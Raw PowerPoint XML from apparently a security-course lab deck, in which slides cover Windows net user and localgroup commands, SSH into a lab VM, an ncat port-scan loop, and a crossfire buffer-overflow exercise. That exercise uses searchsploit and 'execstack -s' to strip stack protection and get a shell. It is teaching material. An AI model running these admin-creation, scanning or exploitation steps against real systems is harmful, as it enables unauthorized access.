            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DefaultAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           Guest                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IEUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sshd_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a: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The command completed successfully.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> administrators</a:t>
            </a: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net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> administrators</a:t>
            </a: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Alias name     administrators</a:t>
            </a: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Comment        Administrators have complete and unrestricted access to the computer/domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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Members</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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-------------------------------------------------------------------------------</a:t>
            </a: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Administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IEUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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 sz="800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sshd_server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0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 sz="800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The command completed successfully.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"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sz="800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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606637" y="708528"/>
            <a:ext cx="4537364" cy="4058735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="-34290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742950" indent="-173038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400" kern="120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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net user alice P@$$word /add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net user alice P@$$word /add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The command completed successfully.</a:t>
            </a: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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net localgroup administrators alice /add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net localgroup administrators alice /add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The command completed successfully.</a:t>
            </a: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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net localgroup administrators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net localgroup administrators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Alias name     administrators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Comment        Administrators have complete and unrestricted access to the computer/domain</a:t>
            </a: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Members</a:t>
            </a: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-------------------------------------------------------------------------------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Administrator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alice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IEUser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sshd_server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The command completed successfully.</a:t>
            </a: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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net localgroup administrators | find "alice"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net localgroup administrators | find "alice"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alice</a:t>
            </a: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C:\&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>runas /u:alice cmd.exe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runas /u:alice cmd.exe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Enter the password for alice: </a:t>
            </a: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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt;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1491" y="4601689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Everything worked until we needed to enter a password!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4149993" y="3920836"/>
            <a:ext cx="456644" cy="680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08495" y="2189655"/>
            <a:ext cx="2451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0C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can use "find" like "grep"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6380617" y="1844747"/>
            <a:ext cx="727878" cy="483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10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6719347" y="2328155"/>
            <a:ext cx="389148" cy="93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781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- SSH, Path variable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921703"/>
            <a:ext cx="8572840" cy="4146123"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Okay, enough with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell is challenging and if we can use something else, why not?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are using the VM, we can start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in task manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you are using your own Windows 10 machine, its possible to enable SSH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noise.paulos.cz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/post/windows10-14352-ssh-server/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH into the Windows machine as user Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We are going to need to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> once we are there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check the path variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\Program Files (x86)\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not there!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add it to PATH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C431E-CF34-8E4C-9230-971E1624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433" y="1684532"/>
            <a:ext cx="3404281" cy="6714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6392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5400"/>
              <a:t>Spoiler ahead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59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- SSH, Path variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Answer</a:t>
            </a:r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7BBF1-5123-6346-8707-72E2DC48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1" y="1417417"/>
            <a:ext cx="3924300" cy="977900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4B6EB1-3079-B44D-A057-8C59B1B1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31" y="2748183"/>
            <a:ext cx="8453137" cy="1286877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5831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- SSH, Path variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Answer</a:t>
            </a:r>
          </a:p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 fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>kali@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> alice@10.10.0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alice@10.10.0.5's password: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Last login: Wed Mar 29 19:06:47 2017 from 10.10.0.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Windows [Version 10.0.14393]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(c) 2016 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\Program Files\OpenSSH\home\alice&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>PATH=C:\Program Files\OpenSSH\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>bin;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Windows\system32;C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Windows;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Wbem;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>WindowsPowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>\v1.0;C:\Program Files\OpenSSH\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>bin;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Users\sshd_server\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>\Local\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>WindowsApps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\Program Files\OpenSSH\home\alice&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>set path=%PATH%;C:\Program Files (x86)\nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\Program Files\OpenSSH\home\alice&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>PATH=C:\Program Files\OpenSSH\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>bin;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Windows\system32;C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Windows;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Wbem;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Windows\System32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>WindowsPowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>\v1.0;C:\Program Files\OpenSSH\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>bin;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Users\sshd_server\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>AppData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>\Local\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>WindowsApps;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>:\Program Files (x86)\nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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38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- Build a Port Scanner with ncat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Using ncat it's possible to make a port scanning tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>-v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for verbose and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>-z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> will give you connection status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using a for loop and a text file, try making a file and using it to scan ports 130-140 on itself using its external IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There are better ways to discover the local listening ports but this is just a demo of how to accomplish the task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For loop syntax: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FOR - Loop through a set of files in one folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FOR /R - Loop through files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>recurse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> subfolders) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FOR /D - Loop through several folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FOR /L - Loop through a range of numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>FOR /F - Loop through items in a text file (each [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>] is a line)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>for /f [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>] in ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>filename.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>) do [command with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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94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5400"/>
              <a:t>Spoiler ahead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9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Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp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Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101378" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body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The goals of the first part of this lab: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find an exploit for crossfire using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>searchsploit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Review the source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If needed, update the exploit so it works for our environment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Execute the exploit and get a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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Just like in our first buffer overflow lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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We need to remove stack protection from crossfire using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>execstack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4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#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sudo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ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>apt-get install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execstack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pPr lvl="4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#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execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> -s ./crossfire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef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7847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Windows - Build a Port Scanner with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ncat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answer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901156"/>
            <a:ext cx="8457858" cy="2708395"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We first need to make a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\&gt; echo 130 &gt;&gt; ports.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\&gt; echo 131 &gt;&gt; ports.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or automate it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>FOR /L %v IN (130,1,140) DO echo %v &gt;&gt; ports.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now scan!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>FOR /f %v IN (ports.txt) DO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
